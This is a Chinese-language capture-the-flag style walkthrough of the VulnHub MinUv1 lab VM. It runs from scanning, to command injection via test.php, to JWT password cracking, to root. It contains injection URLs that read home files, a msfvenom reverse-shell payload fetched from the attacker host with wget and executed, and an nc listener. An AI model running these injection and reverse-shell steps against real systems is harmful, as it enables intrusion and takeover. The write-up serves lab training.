vulnhub之MinUv1的实践

admin 2024年10月21日12:01:22评论13 views字数 1519阅读5分3秒阅读模式

本周实践的是vulnhub的MinUv1镜像,

下载地址,https://download.vulnhub.com/minu/MinUv1.ova.7z,

用virtualbox导入成功,

console上能直接看到地址192.168.0.187,

vulnhub之MinUv1的实践

对靶机做端口扫描sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

获取到靶机开放了80端口的http服务,

vulnhub之MinUv1的实践

对http服务进行php文件路径扫描,

dirb http://192.168.0.187/ -X .php,

获取到http://192.168.0.187/test.php,

vulnhub之MinUv1的实践

浏览器访问http://192.168.0.187/test.php,点击页面超链接,

获取到有文件包含漏洞的路径,

vulnhub之MinUv1的实践

浏览器访问http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+ls /home,获取到home下的bob目录,

vulnhub之MinUv1的实践

查看bob目录下的文件,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+ls -la /home/bob,获取到._pw_

vulnhub之MinUv1的实践

查看._pw_的文件内容,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+cat /home/bob/._pw_,

获取到jwt加密的字符串,下载破解软件,

git clone https://github.com/brendan-rius/c-jwt-cracker.git,

cd c-jwt-cracker,sudo apt update,

sudo apt-get install libssl-dev,make,

破解,./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg,

获取到密码mlnV1,

vulnhub之MinUv1的实践

在kali攻击机上制作反弹shell程序,

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.0.191 lport=4444 -f elf > shell,

kali攻击机开启http下载服务,python2 -m SimpleHTTPServer,

浏览器执行,http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+wget+-O+/tmp/shell+http://192.168.0.191:8000/shell,

浏览器执行http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+chmod 777 /tmp/shell,

kali攻击机上开启反弹shell监听,nc -lvp 4444,

浏览器执行http://192.168.0.187/test.php?file=www.hackingarticles.in;+$u+/tmp/shell,

kali攻击机上获取到反弹shell,转成交互式shell,

SHELL=/bin/bash script -q /dev/null,

切换到root,用上面获取到的密码,id确认是root,

vulnhub之MinUv1的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之MinUv1的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日12:01:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之MinUv1的实践https://cn-sec.com/archives/3294027.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息